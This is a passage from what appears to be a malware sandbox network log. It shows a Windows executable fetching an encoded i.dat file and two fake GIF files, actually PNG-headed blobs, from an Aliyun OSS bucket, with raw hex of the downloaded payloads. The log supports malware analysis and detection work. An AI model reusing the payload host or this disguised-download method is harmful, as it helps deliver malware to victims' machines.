0	192.168.2.9	49973	39.103.20.105	443	7616	C:\Users\user\Desktop\2976587-987347589.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:43:42 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: 662hfg.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:43:43 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:43:43 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 6781E8EF998B3E33361BE786 Accept-Ranges: bytes ETag: "A1CC6E3DD3069453BEF8913F9698C666" Last-Modified: Fri, 10 Jan 2025 12:35:03 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 15148768218617465077 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: ocxuPdMGlFO++JE/lpjGZg== x-oss-server-time: 3
2025-01-11 03:43:43 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 06 06 02 58 3e 3f 76 37 44 44 1a 54 3a 79 36 31 58 5b 58 5f 38 71 3e 33 5a 4a 46 5d 3e 2e 73 3e 51 53 11 5f 71 38 36 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 39 51 4d 4d 49 3a 73 66 66 50 50 54 0e 68 69 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 05 05 01 5b 3d 3c 75 34 47 47 19 57 39 7a 35 32 5b 58 5b 5c 3b 72 3d 30 59 49 45 5e 3d 2d 70 3d 52 50 12 5e 70 39 37 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 38 50 4c 4c 48 3b 72 67 67 51 51 55 0f 69 68 21 Data Ascii: l%00X>?v7DDT:y61X[X_8q>3ZJF]>.s>QS_q86999999999999999999999999999999999QMMI:sffPPThi aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33[=<u4GGW9z52[X[\;r=0YIE^=-p=RP^p97888888888888888888888888888888888PLLH;rggQQUih!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49974	39.103.20.105	443	7616	C:\Users\user\Desktop\2976587-987347589.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:43:44 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: 662hfg.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:43:44 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:43:44 GMT Content-Type: image/gif Content-Length: 135589 Connection: close x-oss-request-id: 6781E8F034D7B336306AFBF2 Accept-Ranges: bytes ETag: "0DDD3F02B74B01D739C45956D8FD12B7" Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 8642451798640735006 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw== x-oss-server-time: 9
2025-01-11 03:43:44 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c 87 Data Ascii: Xgf%a(\|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\aU##l3]x(c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg\|M[mm&}!rt=b!){{4{e5\|8
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90 92 Data Ascii: Il]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91 ea Data Ascii: c}.0VmO2O?:G6O#y;10[XhvX&+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz\|7I}r@\|
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1 55 Data Ascii: /r+.'wH:M7N0]%'Me"!pu\|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`U
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1 92 Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)\|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#\|1-PWlno<\|vwx1P]LHXEI
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7 17 Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a 58 Data Ascii: UqLT&&oabc\|}~x3~=,N<>HEO>L.XU_.\heo+lxu;\|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_X
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2 52 Data Ascii: Z~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph\|{NJLR
2025-01-11 03:43:44 UTC	4096	IN	Data Raw: 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd 19 Data Ascii: WUsXa`e/nnbc\|}~x;9y}QTp\|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o\|PRSTY'xe89-jYkk$P}wtuixyz\|~9~mMtwv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49975	39.103.20.105	443	7616	C:\Users\user\Desktop\2976587-987347589.08.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:43:46 UTC	111	OUT	GET /b.gif HTTP/1.1 User-Agent: GetData Host: 662hfg.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-11 03:43:46 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sat, 11 Jan 2025 03:43:46 GMT Content-Type: image/gif Content-Length: 125333 Connection: close x-oss-request-id: 6781E8F29F6B6036370CAEFC Accept-Ranges: bytes ETag: "2CA9F4AB0970AA58989D66D9458F8701" Last-Modified: Fri, 10 Jan 2025 12:30:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10333201072197591521 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: LKn0qwlwqliYnWbZRY+HAQ== x-oss-server-time: 18
2025-01-11 03:43:46 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-11 03:43:46 UTC	4096	IN	Data Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 Data Ascii: ^_X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-11 03:43:46 UTC	4096	IN	Data Raw: 6d 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 Data Ascii: mmkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-11 03:43:46 UTC	4096	IN	Data Raw: c2 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-11 03:43:46 UTC	4096	IN	Data Raw: 19 d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-11 03:43:47 UTC	4096	IN	Data Raw: de 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-11 03:43:47 UTC	4096	IN	Data Raw: 19 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 